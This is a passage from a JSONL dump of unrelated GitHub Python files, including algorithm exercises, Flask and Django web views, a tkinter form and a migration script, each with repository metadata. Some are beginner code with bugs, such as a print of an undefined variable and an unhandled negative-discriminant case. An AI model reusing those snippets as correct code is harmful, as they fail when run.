print(\"Perfection.\")\n","repo_name":"frazebean/automate_the_boring_stuff","sub_path":"math_quiz.py","file_name":"math_quiz.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"1320221990","text":"def canPartition(nums):\n\ttarget, n = sum(nums), len(nums)\n\tif target & 1: return False\n\ttarget >>= 1\n\tdp = [True] + [False]*target\n\tfor x in nums:\n\t\tdp = [dp[s] or (s >= x and dp[s-x]) for s in range(target+1)]\n\t\tif dp[target]: return True\n\treturn False\n\nif __name__ == '__main__':\n\n nums = [1,5,11,5]\n print(canPartition(nums))","repo_name":"garcha-amanjot-au28/fprt-deployment","sub_path":"coding-challenges/week14/day03/equal_subset.py","file_name":"equal_subset.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16721077068","text":"\"\"\"\n2.2[12]: Петя и Катя – брат и сестра. Петя – студент, а Катя – школьница. Петя помогает Кате по математике. Он задумывает два\nнатуральных числа X и Y (X,Y≤1000), а Катя должна их отгадать.\nДля этого Петя делает две подсказки. Он называет сумму этих чисел S и их произведение P. Помогите Кате отгадать задуманные Петей числа.\n\nПримеры/Тесты:\n4 4 -> 2 2\n5 6 -> 2 3\n\nПримечание.\nЗдесь нужно составить два уравнения. Которые приведут к квадратному уравнению.\nКто не помнит, как решать квадратное уравнение - посмотрите в сети. Обойдите дополнительной проверкой возможность комплексных решений.\nМожно игнорировать то, что получаться рациональные решения вместо натуральных.\n\nДля вычисления квадратного корня используйте возведение в степень 0.5 или (*) Усложнение. найдите самостоятельно в сети какая функция\nстандартной библиотеки вычисляет квадратный корень и как до нее добраться.\n\"\"\"\n\n# Инструкция постороения и решения квадратичного уравнения на примере нашей задачи:\n\n# на пример х = 5, а у = 3\n\n# s = x + y Сумма равна 8\n# p = x * y Произведение равно 15\n# x = s - y\n# x = p / y\n# s - y = p / y\n# 8 - y = 15 / y\n# (8 - y)y = 15\n# 8y - y2 = 15\n# -y2 + 8y = 15 [*-1 = next_str]\n# y2 - 8y = -15\n# y2 - 8y + 15 = 0\n\n### D = b2 - 4ac\n# D = 64 - 4 * 1 * 15\n# D = 4\n\n### if D > 0 --->>> x1 and x2, ну в этом случае y1 and y2\n### if D == 0 --->>> x1 = x2 = x, ну в этом случае y, то есть ур-е имеет 1 решение(корень, то есть x or y)\n### if D < 0 --->>> нет решения, то есть невозможно найти значение x(в этом случае y), почему хз\n\n### x1 = (-b + sq(D)) / 2a\n### x2 = (-b - sq(D)) / 2a\n\n# x1 = (8 + 2) / 2 = 5 то есть x или y = 5\n# x2 = (8 - 2) / 2 = 3 то есть x или y = 3\n\n\nxV = int(input('Введите число X от 0 до 1000: ')) # 5\nyV = int(input('Введите число Y от 0 до 1000: ')) # 3\n\ns = xV + yV # 8\np = xV * yV # 15\n\ndiscrim = (s * s) - 4 * p\ndisSqr = discrim ** (0.5)\n\nif discrim > 0:\n x = (s + disSqr) / 2\n y = (s - disSqr) / 2\nelif discrim == 0:\n x = s / 2\n y = x\n\nprint(f'Вы ввели X = {xV}')\nprint(f'Вы ввели Y = {yV}')\nprint(f'Сумма введённых чисел = {s}')\nprint(f'Произведение введённых чисел = {p}')\nprint('')\nprint(f'Катя отгадала X и Y = {int(x)} и {int(y)} или наоборот')\nprint('')\n","repo_name":"G-Relaxant/PythonSeminarsAndHomework","sub_path":"Seminar2/Homework/Task_2.2[12].py","file_name":"Task_2.2[12].py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6431334964","text":"import tkinter as tk\nfrom tkinter import ttk\n\nimport src.constants as cst\n\n\nclass ViewModeVPC:\n def __init__(self, master:tk.Widget):\n\n # Variables\n self.var_peep = tk.IntVar(master)\n self.var_p_support = tk.IntVar(master)\n self.var_ti = tk.DoubleVar(master)\n self.var_br = tk.IntVar(master)\n self.var_trigger = tk.DoubleVar(master)\n\n # Elements\n self.peep_label = ttk.Label(master, text=\"PEP\", width=cst.W_LABEL)\n self.peep_spin = ttk.Spinbox(master, textvariable=self.var_peep, width=cst.W_SPINBOX)\n self.peep_unit = ttk.Label(master, text=\"cmH2O\", width=cst.W_UNIT)\n self.p_support_label = ttk.Label(master, text=\"Psupport\", width=cst.W_LABEL)\n self.p_support_spin = ttk.Spinbox(master, textvariable=self.var_p_support, width=cst.W_SPINBOX)\n self.p_support_unit = ttk.Label(master, text=\"cmH2O\", width=cst.W_UNIT)\n self.ti_label = ttk.Label(master, text=\"Temps inspi\", width=cst.W_LABEL)\n self.ti_spin = ttk.Spinbox(master, textvariable=self.var_ti, width=cst.W_SPINBOX)\n self.ti_unit = ttk.Label(master, text=\"s\", width=cst.W_UNIT)\n self.br_label = ttk.Label(master, text=\"Fréquence respi\", width=cst.W_LABEL)\n self.br_spin = ttk.Spinbox(master, textvariable=self.var_br, width=cst.W_SPINBOX)\n self.br_unit = ttk.Label(master, text=\"/min\", width=cst.W_UNIT)\n self.trigger_label = ttk.Label(master, text=\"Trigger\", width=cst.W_LABEL)\n self.trigger_spin = ttk.Spinbox(master, textvariable=self.var_trigger, width=cst.W_SPINBOX)\n self.trigger_unit = ttk.Label(master, text=\"l/min\", width=cst.W_UNIT)\n\n # Place the elements\n self.peep_label.grid(row=0, column=0)\n self.peep_spin.grid(row=0, column=1)\n self.peep_unit.grid(row=0, column=2, padx=(5, 0))\n self.p_support_label.grid(row=1, column=0)\n self.p_support_spin.grid(row=1, column=1)\n self.p_support_unit.grid(row=1, column=2, padx=(5, 0))\n self.ti_label.grid(row=2, column=0)\n self.ti_spin.grid(row=2, column=1)\n self.ti_unit.grid(row=2, column=2, padx=(5, 0))\n self.br_label.grid(row=3, column=0)\n self.br_spin.grid(row=3, column=1)\n self.br_unit.grid(row=3, column=2, padx=(5, 0))\n self.trigger_label.grid(row=4, column=0)\n self.trigger_spin.grid(row=4, column=1)\n self.trigger_unit.grid(row=4, column=2, padx=(5, 0))\n","repo_name":"deplanty/virtual-respirator","sub_path":"src/frames/views/modes/vpc.py","file_name":"vpc.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"7437220119","text":"\"\"\"\nAccount operations\n- search\n- editing of metadata (?)\n- list of transactions / register -> see transaction controller\n\"\"\"\ntry:\n import simplejson as json\nexcept ImportError:\n import json\nimport logging\n\nfrom flask import Blueprint, render_template, request\n\nfrom gnucash_portfolio_webui.models.account_models import (AccountDetailsViewModel,\n AccountTransactionsInputModel,\n AccountTransactionsRefModel,\n AccountTransactionsViewModel)\nfrom gnucash_portfolio.accounts import AccountsAggregate\nfrom gnucash_portfolio.bookaggregate import BookAggregate\nfrom gnucash_portfolio.currencies import CommodityTypes\nfrom gnucash_portfolio.lib import datetimeutils, generic\nfrom piecash import Account, Split, Transaction\n\naccount_controller = Blueprint( # pylint: disable=invalid-name\n 'account_controller', __name__, url_prefix='/account')\n\n\n@account_controller.route('/')\ndef index():\n \"\"\" root page \"\"\"\n return render_template('account.html')\n\n\n@account_controller.route('/favourites')\ndef favourites():\n \"\"\" Favourite accounts \"\"\"\n with BookAggregate() as svc:\n model = __load_favourite_accounts_model(svc)\n\n return render_template('account.favourites.html', model=model)\n\n\n@account_controller.route('/list')\ndef all_accounts():\n \"\"\" Displays all book accounts \"\"\"\n with BookAggregate() as svc:\n accounts = svc.accounts.get_all()\n # Sort by full name.\n accounts.sort(key=lambda x: x.fullname)\n\n model = {\"accounts\": accounts}\n return render_template('account.list.html', model=model)\n\n\n@account_controller.route('/search')\ndef search():\n \"\"\" Search for an account by typing in a part of the name \"\"\"\n return render_template('account.search.html')\n\n\n@account_controller.route(\"/find\")\ndef find():\n \"\"\"\n Search for an account with the given text in the name.\n Returns JSON result. Used for datatables.\n \"\"\"\n term = request.args.get(\"search[value]\")\n model_array = []\n\n # Ignore empty requests\n if term:\n # Search in any part of the name\n term = '%' + term + '%'\n # search\n model_array = __load_search_model(term)\n\n # data-table expected formatting. Unless I find a way to customize the client-side.\n model = {\n \"data\": model_array,\n \"records_total\": len(model_array)\n }\n json_output = json.dumps(model)\n return json_output\n\n\n@account_controller.route('/cash')\ndef cash_balances():\n \"\"\" Investment cash balances \"\"\"\n account_names = request.form.get(\"accounts\")\n account_names = account_names if account_names else \"Assets:Investments\"\n model = {\n \"accounts\": account_names,\n \"data\": []\n }\n # Selection of accounts. Display the default values the first time.\n with BookAggregate() as book_svc:\n accts_svc = AccountsAggregate(book_svc.book)\n acct = accts_svc.get_by_fullname(account_names)\n acct_svc = accts_svc.get_account_aggregate(acct)\n model[\"data\"] = acct_svc.load_cash_balances_with_children(\n account_names)\n # Display the report\n return render_template('account.cash.html', model=model)\n\n\n@account_controller.route('/splits', methods=['GET'])\ndef transactions():\n \"\"\" Account transactions \"\"\"\n with BookAggregate() as svc:\n in_model = model = AccountTransactionsInputModel()\n\n reference = __load_ref_model_for_tx(svc)\n\n # Check if any parameters were passed already\n account_fullname = request.args.get('acct_name')\n if account_fullname:\n acct = svc.accounts.get_by_fullname(account_fullname)\n in_model.account_id = acct.guid\n\n model = __load_view_model_for_tx(svc, in_model)\n\n return render_template(\n 'account.transactions.html',\n model=model, input_model=in_model, reference=reference)\n\n\n@account_controller.route('/splits', methods=['POST'])\ndef transactions_post():\n \"\"\" Account transactions \"\"\"\n input_model = __get_input_model_for_tx()\n return account_splits(input_model.account_id)\n\n\n@account_controller.route('//details')\ndef account_details(acct_id):\n \"\"\" Displays account details \"\"\"\n with BookAggregate() as svc:\n model = __load_account_details_model(svc, acct_id)\n\n return render_template('account.details.html', model=model)\n\n\n@account_controller.route('//splits')\ndef account_splits(acct_id: str):\n \"\"\" Displays account transactions with splits in period \"\"\"\n input_model = __get_input_model_for_tx()\n input_model.account_id = acct_id\n\n with BookAggregate() as svc:\n reference = __load_ref_model_for_tx(svc)\n model = __load_view_model_for_tx(svc, input_model)\n\n return render_template(\n 'account.transactions.html',\n model=model, input_model=input_model, reference=reference)\n\n\n@account_controller.route('/transactions')\ndef account_transactions():\n \"\"\" Lists only transactions \"\"\"\n account_id = request.args.get(\"accountId\")\n model = {\n \"account_id\": account_id\n }\n return render_template('account.transactions.vue.html', model=model)\n\n\n@account_controller.route('/details/')\ndef details(fullname):\n \"\"\" Displays account details \"\"\"\n with BookAggregate() as svc:\n account = svc.accounts.get_by_fullname(fullname)\n\n model = __load_account_details_model(svc, account.guid)\n\n return render_template('account.details.html', model=model)\n\n\n#############\n# Partials\n\n@account_controller.route('/partial/favourites')\ndef api_favourites():\n \"\"\" list of favourite accounts with balances \"\"\"\n with BookAggregate() as svc:\n model = __load_favourite_accounts_model(svc)\n\n return render_template('_account.favourites.html', model=model)\n\n\n#################\n# API section\n\n@account_controller.route('/api/search')\ndef search_api():\n \"\"\" searches for account by name and returns the json list of results \"\"\"\n term = request.args.get('query')\n with BookAggregate() as svc:\n accounts = svc.accounts.find_by_name(term)\n # result = json.dumps(accounts)\n model_list = [{\"name\": account.fullname, \"id\": account.guid}\n for account in accounts]\n model_list.sort(key=lambda x: x[\"name\"])\n\n result_dict = {\"suggestions\": model_list}\n result = json.dumps(result_dict)\n return result\n\n\n@account_controller.route('/api/search_autocomplete')\ndef api_search_autocomplete():\n \"\"\" format the output for autocomplete. Client-side customization does not work\n for some reason. \"\"\"\n term = request.args.get('query')\n with BookAggregate() as svc:\n accounts = svc.accounts.find_by_name(term)\n # result = json.dumps(accounts)\n model_list = [{\"value\": account.fullname, \"data\": account.guid}\n for account in accounts]\n model_list.sort(key=lambda x: x[\"value\"])\n\n result_dict = {\"suggestions\": model_list}\n result = json.dumps(result_dict)\n return result\n\n\n@account_controller.route('/api/transactions')\ndef api_transactions():\n \"\"\" Returns account transactions \"\"\"\n from pydatum import Datum\n\n # get parameters\n dateFromStr = request.args.get(\"dateFrom\")\n dateFrom = Datum()\n dateFrom.from_iso_date_string(dateFromStr)\n dateToStr = request.args.get(\"dateTo\")\n dateTo = Datum()\n dateTo.from_iso_date_string(dateToStr)\n account_id = request.args.get(\"account\")\n\n # get data\n with BookAggregate() as svc:\n acc_agg = svc.accounts.get_aggregate_by_id(account_id)\n txs = acc_agg.get_transactions(dateFrom.value, dateTo.value)\n records = []\n\n # return results\n model = {\n \"accountName\": acc_agg.account.fullname,\n \"startBalance\": acc_agg.get_start_balance(dateFrom.value),\n \"endBalance\": acc_agg.get_end_balance(dateTo.value),\n \"transactions\": []\n }\n\n for tx in txs:\n # this_split = [split for split in tx.splits if split.transaction == tx][0]\n # this_split = tx.splits.filter(Split.account_guid == account_id).one()\n tx_agg = svc.transactions.get_aggregate(tx)\n value = tx_agg.get_value_of_splits_for_account(account_id)\n quantity = tx_agg.get_quantity_of_splits_for_account(account_id)\n\n records.append({\n \"id\": tx.guid,\n \"date\": tx.post_date.strftime(\"%Y-%m-%d\"),\n \"description\": tx.description,\n \"notes\": tx.notes,\n \"value\": value,\n \"quantity\": quantity\n })\n model[\"transactions\"] = records\n\n result = json.dumps(model)\n return result\n\n\n######################\n# Private\n\ndef __get_input_model_for_tx() -> AccountTransactionsInputModel:\n \"\"\" Parse user input or create a blank input model \"\"\"\n model = AccountTransactionsInputModel()\n\n if request.args:\n # model.account_id = request.args.get('account')\n model.period = request.args.get('period')\n\n if request.form:\n # read from request\n model.account_id = request.form.get('account')\n model.period = request.form.get('period')\n\n return model\n\n\ndef __load_ref_model_for_tx(svc: BookAggregate):\n \"\"\" Load reference model \"\"\"\n model = AccountTransactionsRefModel()\n\n root_acct = svc.accounts.get_by_fullname(\"Assets\")\n model.accounts = (\n svc.accounts.get_account_aggregate(root_acct)\n .get_all_child_accounts_as_array()\n )\n\n return model\n\n\ndef __load_view_model_for_tx(\n svc: BookAggregate,\n input_model: AccountTransactionsInputModel\n) -> AccountTransactionsViewModel():\n \"\"\" Loads the filtered data \"\"\"\n assert isinstance(input_model.period, str)\n\n model = AccountTransactionsViewModel()\n if not input_model.account_id:\n return model\n\n # Load data\n\n # parse periods\n period = datetimeutils.parse_period(input_model.period)\n\n date_from = period[0]\n date_to = period[1]\n logging.debug(f\"got range: {input_model.period}. Parsed to {date_from} - {date_to}\")\n\n account = svc.accounts.get_by_id(input_model.account_id)\n model.start_balance = svc.accounts.get_account_aggregate(\n account).get_start_balance(date_from)\n model.end_balance = svc.accounts.get_account_aggregate(\n account).get_end_balance(date_to)\n\n query = (\n svc.book.session.query(Split)\n .join(Transaction)\n .filter(Split.account_guid == input_model.account_id)\n .filter(Transaction.post_date >= date_from.date())\n .filter(Transaction.post_date <= date_to.date())\n .order_by(Transaction.post_date)\n )\n model.splits = query.all()\n\n return model\n\n\ndef __load_search_model(search_term):\n \"\"\" Loads the data and returns an array of model objects\"\"\"\n model_array = []\n\n with BookAggregate() as svc:\n records = (\n svc.book.session.query(Account)\n .filter(Account.name.like(search_term))\n .all())\n\n for account in records:\n account_model = {\n \"name\": account.name,\n \"fullname\": account.fullname\n }\n model_array.append(account_model)\n\n return model_array\n\n\ndef __load_account_details_model(svc: BookAggregate, acct_id: str) -> AccountDetailsViewModel:\n \"\"\" Loads account details view model \"\"\"\n agg = svc.accounts.get_aggregate_by_id(acct_id)\n\n model = AccountDetailsViewModel()\n model.account = agg.account\n model.quantity = agg.get_balance()\n if agg.account.commodity.namespace != CommodityTypes.CURRENCY.name:\n model.security_details_url = \"/security/details/\" + agg.account.commodity.mnemonic\n\n return model\n\n\ndef __load_favourite_accounts_model(svc: BookAggregate):\n \"\"\" Loads the view model with favourite accounts information \"\"\"\n #accounts = svc.accounts.get_list(favourite_accts)\n accounts = svc.accounts.get_favourite_accounts()\n # sort by name\n accounts.sort(key=lambda acc: acc.name)\n\n model = {\n \"accounts\": accounts\n }\n return model\n","repo_name":"alensiljak/gnucash-portfolio-webui","sub_path":"gnucash_portfolio_webui/controllers/account_controller.py","file_name":"account_controller.py","file_ext":"py","file_size_in_byte":12252,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"12242264805","text":"import pandas as pd\nimport pickle\n\ndef predict(X_test):\n # load the model and the pipeline\n with open('model.pkl', 'rb') as f:\n model = pickle.load(f)\n\n with open('pipeline.pkl', 'rb') as f:\n pipeline = pickle.load(f)\n\n predictions = pd.DataFrame(model.predict(pipeline.transform(X_test)), columns=['LeaveOrNot'],\n index=X_test.index)\n return predictions\n\ndef main():\n # read X_test\n X_test = pd.read_csv('X_test.csv', index_col=0)\n predictions = predict(X_test)\n predictions['LeaveOrNot'].to_json('y_test_pred.json')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AndroZa0812/NayaProject4","sub_path":"execute_model.py","file_name":"execute_model.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35431079028","text":"\"\"\"\nGets a positive integer from a user.\n\nDemonstrates main.\n\"\"\"\n\n\ndef main():\n i = get_revenue()\n print(f\"${r}\")\n\n\ndef get_revenue():\n while True:\n n = int(input(\"Revenue: \"))\n if n >= 0:\n return n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hbap/python1","sub_path":"positive.py","file_name":"positive.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"14581607167","text":"from django.conf import settings\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib import messages\nfrom django.template.loader import get_template\nfrom django.core.mail import send_mail, EmailMultiAlternatives\n# Same App importing\nfrom food_newsletters.models import NewsLetterUsers\nfrom food_newsletters.forms import NewsLetterUsersSignUpForm\n\n\ndef newsletter_subscribe(request):\n \"\"\"Subscription\"\"\"\n form = NewsLetterUsersSignUpForm()\n if request.method == 'POST':\n print('working')\n email = request.POST['email']\n try:\n NewsLetterUsers.objects.create(email=email)\n messages.success(request, 'Email has been submitted!',\n 'alert alert-success alert-dismissible')\n subject = 'Thank you for joining my Newsletter!'\n from_email = settings.EMAIL_HOST_USER\n to_email = [email]\n\n with open(settings.BASE_DIR + '/templates/food_newsletters/subscribe_email_message.txt') as f:\n signup_message = f.read()\n message = EmailMultiAlternatives(subject=subject, body=signup_message,\n from_email=from_email, to=to_email)\n html_template = get_template('food_newsletters/subscribe_email_message.html').render()\n message.attach_alternative(html_template, 'text/html')\n message.send()\n except:\n messages.warning(request, 'Email already exists!', 'alert alert-warning alert-dismissible')\n\n context = {'form': form}\n template = 'food_newsletters/subscribe.html'\n return render(request, template, context)\n # return redirect('/home/')\n\n\ndef newsletter_unsubscribe(request):\n \"\"\"Un-subscription\"\"\"\n form = NewsLetterUsersSignUpForm(request.POST or None)\n\n if request.method == 'POST':\n email = request.POST['email']\n if NewsLetterUsers.objects.filter(email=email).exists():\n instance = NewsLetterUsers.objects.filter(email=email)\n instance.delete()\n messages.success(request, 'Email has been removed!',\n 'alert alert-success alert-dismissible')\n subject = 'You have been Unsubscribed!'\n from_email = settings.EMAIL_HOST_USER\n to_email = [email]\n\n with open(settings.BASE_DIR + '/templates/food_newsletters/unsubscribe_email_message.txt') as f:\n signup_message = f.read()\n message = EmailMultiAlternatives(subject=subject, body=signup_message,\n from_email=from_email, to=to_email)\n html_template = get_template('food_newsletters/unsubscribe_email_message.html').render()\n message.attach_alternative(html_template, 'text/html')\n message.send()\n\n else:\n messages.warning(request, 'Email is not in the Database!',\n 'alert alert-warning alert-dismissible')\n\n context = {'form': form}\n template = 'food_newsletters/unsubscribe.html'\n return render(request, template)\n\n","repo_name":"siyam04/food-service-c2c-django","sub_path":"food_newsletters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"81"} +{"seq_id":"72657946185","text":"#!/usr/bin/python3\nimport sys\n\n\ndef main():\n n = len(sys.argv) - 1\n cont = 0\n print(\"{:d} argument\".format(n) + (\":\" if n == 1 else \"s\"), end=\"\")\n if n == 0:\n print(\".\", end=\"\")\n print(\":\" if n > 1 else \"\")\n while cont < n:\n if n > 0:\n print(\"{:d}: {}\".format(cont + 1, sys.argv[cont + 1]))\n cont += 1\nif __name__ == \"__main__\":\n main()\n","repo_name":"cristian0497/High-Level-Programming","sub_path":"0x02-python-import_modules/2-args.py","file_name":"2-args.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17615733400","text":"\"\"\"empty message\n\nRevision ID: d26c98f417da\nRevises: a24d4e0bf8aa\nCreate Date: 2021-12-02 15:18:21.863916\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd26c98f417da'\ndown_revision = 'a24d4e0bf8aa'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_index('anomaly_data_output_query_idx', 'anomaly_data_output', ['kpi_id', 'anomaly_type', 'series_type', 'data_datetime'], unique=False)\n op.create_index('rca_data_query_idx', 'rca_data', ['kpi_id', 'data_type', 'end_date'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('rca_data_query_idx', table_name='rca_data')\n op.drop_index('anomaly_data_output_query_idx', table_name='anomaly_data_output')\n # ### end Alembic commands ###\n","repo_name":"chaos-genius/chaos_genius","sub_path":"migrations/versions/d26c98f417da_.py","file_name":"d26c98f417da_.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":651,"dataset":"github-code","pt":"81"} +{"seq_id":"74895998026","text":"# Un programa que imprima en pantalla la sucesion de fibonacci preguntando\n# el valor maximo al usuario.\nimport os\n\n\ndef Fibonacci_numbers():\n os.system(\"cls\")\n print(\"\\nExercise with fibonacci numbers\")\n\n def fibonacci(n):\n a = 0\n b = 1\n fib = []\n\n if a < n:\n fib.append(a)\n if b < n:\n fib.append(b)\n\n for k in range(n):\n c = a + b\n a = b\n b = c\n\n if b < n:\n fib.append(b)\n\n return print(fib)\n\n fibonacci(int(input(\"up to what value do you want to indent: \")))\n print(\"\\nEnd of program\\n\")\n\n\nif __name__ == \"__main__\":\n Fibonacci_numbers()\n","repo_name":"MiguelImparable/Pruebas-en-python","sub_path":"package/Fibonacci_numbers.py","file_name":"Fibonacci_numbers.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15207414062","text":"def twoSum(nums, target):# Exceed time limit\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n index_list = list(range(len(nums)))\n while index_list:\n base = [index_list.pop(0)] #base = [0], base = [1], base = [2] ...\n print(base)\n base2 = list(set(index_list)-set(base)) #base2 = [1,2,3]\n print(\"base2\")\n print(base2)\n while base2:\n sub = base + [base2.pop(0)] # [0,1] base2 = [2,3]\n print(\"sub\")\n print(sub)\n print(nums[sub[0]]+nums[sub[1]])\n if nums[sub[0]]+nums[sub[1]] == target:\n return sub\nprint(twoSum([3,2,3],5))\n\ndef twoSum1(nums, target):# O(N) = 1\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n index_list = list(range(len(nums)))\n d = {}\n for i in index_list:\n if target-nums[i] in d:\n return [i,d[target-nums[i]]]\n else:\n d[nums[i]] = i\nprint(twoSum1([3,2,3],5))\n","repo_name":"Adonais0/Leetcode_Solutions","sub_path":"leetcode_two_sums.py","file_name":"leetcode_two_sums.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6903943580","text":"def number_of_games(rounds,players):\n if rounds == 0:\n return 0\n if len(players) == 2:\n return all(players)\n games = [players[i:i+2] for i in range(0,len(players)-1,2)]\n next_players = list(map(any,games))\n games_played = sum(map(all,games))+number_of_games(rounds-1, next_players)\n return games_played\n\ntest_cases = [(2,[1,1,1,1]), (1,[1,1,1,1]), (2,[0,1,1,0]), (2, [1,0,1,0,1,0,1,0])]\nfor case in test_cases:\n print(number_of_games(*case))\n \n\n\n","repo_name":"JaviMaligno/Las12uvas2022","sub_path":"10. Toreno de pádel/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2786067550","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\n\nadmin.autodiscover()\n\nurlpatterns = patterns('web.views',\n url(r'^$', 'home', name='home'),\n url(r'^about/$', 'about'),\n url(r'^awards/$', 'awards'),\n url(r'^candidates/$', 'candidates'),\n url(r'^contact/$', 'officers'),\n url(r'^emcc/$', 'emcc'),\n url(r'^fe/$', 'fe'),\n url(r'^programs/$', 'programs'),\n url(r'^requirements/$', 'requirements'),\n url(r'^tutoring/$', 'tutoring'),\n\n url(r'^donate/$', 'donate'),\n url(r'^sponsor/$', 'sponsor'),\n url(r'^officers/$', 'officers'),\n url(r'^faculty/$', 'faculty'),\n url(r'^calendar/$', 'room_calendar'),\n)\n\nurlpatterns += patterns('main.views',\n url(r'^tutoring_admin/$', 'tutoring_admin'),\n url(r'^houses/$', 'houses'),\n\n url(r'^profile_requirements/$', 'requirements_view'),\n url(r'^candidate_requirements/$', 'candidates'),\n url(r'^pending_community_service/$', 'pending_community_service'),\n url(r'^active_members/$', 'active_members'),\n url(r'^downloads/$', 'downloads'),\n\n # url(r'^spreadsheet/$', 'spreadsheet'),\n url(r'^all_profiles/$', 'all_profiles'),\n url(r'^resumes_pdf/$', 'resumes_pdf'),\n url(r'^resumes_word/$', 'resumes_word'),\n\n url(r'^logout/$', 'logout'),\n url(r'^login/$', 'login'),\n url(r'^password_reset/$', 'password_reset'),\n url(r'^password_reset_done/$', 'password_reset_done'),\n url(r'^password_reset_confirm/(?P[0-9A-Za-z]+)-(?P.+)/$', 'password_reset_confirm'),\n url(r'^password_reset_complete/$', 'password_reset_complete'),\n url(r'^profile/$', 'profile_view'),\n url(r'^edit/$', 'edit'),\n url(r'^add/$', 'add'),\n url(r'^register/$', 'register'),\n url(r'^account/$', 'account'),\n url(r'^upload/$', 'upload'),\n url(r'^testbank/$', 'testbank'),\n url(r'^testbank/file/(?P\\d+)/(?P.*)$', 'test_file'),\n url(r'^testbank/file/(?P\\d+)$', 'test_file'),\n url(r'^uploadreviewsheet/$', 'upload_review_sheet'),\n url(r'^reviewsheets/$','reviewsheetbank'),\n url(r'^reviewsheets/file/(?P\\d+)$', 'reviewsheets'),\n url(r'^reviewsheets/file/(?P\\d+)/(?P.*)$', 'reviewsheets'),\n \n url(r'^resume_pdf/$', 'resume_pdf'),\n url(r'^resume_pdf/(?P\\d+)$', 'resume_pdf'),\n url(r'^resume_word/$', 'resume_word'),\n url(r'^resume_word/(?P\\d+)$', 'resume_word'),\n url(r'^interview/$', 'interview'),\n url(r'^interview/(?P\\d+)$', 'interview'),\n url(r'^proof/$', 'proof'),\n url(r'^proof/(?P\\d+)$', 'proof'),\n\n url(r'^add_requirement/$', 'add_requirement'),\n\n)\n\nurlpatterns += patterns('event.views',\n url(r'^events/$', 'events'),\n url(r'^events/manage$', 'manage_events'),\n url(r'^events/(?P\\w+)/$', 'event'),\n url(r'^cb_race/$', 'event_redirect', {'event_url': 'cb_race'}),\n url(r'^scholarship/$', 'event_redirect', {'event_url': 'scholarship'}),\n url(r'^rubegoldberg/$', 'event_redirect', {'event_url' : 'RG2016'}),\n url(r'^charitypoker/$', 'event_redirect', {'event_url' : 'CharityPoker'}),\n)\n\nurlpatterns += patterns('',\n url(r'^schedule/$', 'tutoring.views.schedule'),\n url(r'^classes/$', 'tutoring.views.classes'),\n url(r'^expanded_schedule/$', 'tutoring.views.expanded_schedule'),\n url(r'^tutoring/feedback/$', 'tutoring.views.feedback'),\n url(r'^tutoring/log_hours/$', 'tutoring.views.tutoring_logging'),\n url(r'^tutoring_admin/csvdump/$', 'tutoring.views.getTutoringCsv'),\n url(r'^tutoring_admin/update_schedule/$', 'tutoring.views.update_schedule'),\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n url(r'^admin/', include(admin.site.urls)),\n# url(r'', include('tbpsite.urls'))\n)\n\nurlpatterns += patterns('',\n url(r'^rg_signup/$', RedirectView.as_view(url='https://goo.gl/forms/QJDTetubbD8vMGNc2')),\n url(r'^rg_event/$', RedirectView.as_view(url='https://www.facebook.com/events/225337421258770/')),\n url(r'^oa/$', RedirectView.as_view(url='https://docs.google.com/forms/d/e/1FAIpQLSeUHGyweGT6P2p269Ol_9adgzhjkGOGxKRlqQxNXyADqbyOPg/viewform?usp=sf_link')),\n)\n","repo_name":"UCLA-TBP/tbpsite","sub_path":"backend/tbpsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26402696497","text":"import sys\n\nsdoku = [list(map(int, sys.stdin.readline().rstrip().split())) for i in range(9)]\ndef backtrack(start, comb):\n if comb==0:\n return\n for i in range(start, 10):\n comb.append(i)\n backtrack(i+1, comb)\n comb.pop()\n 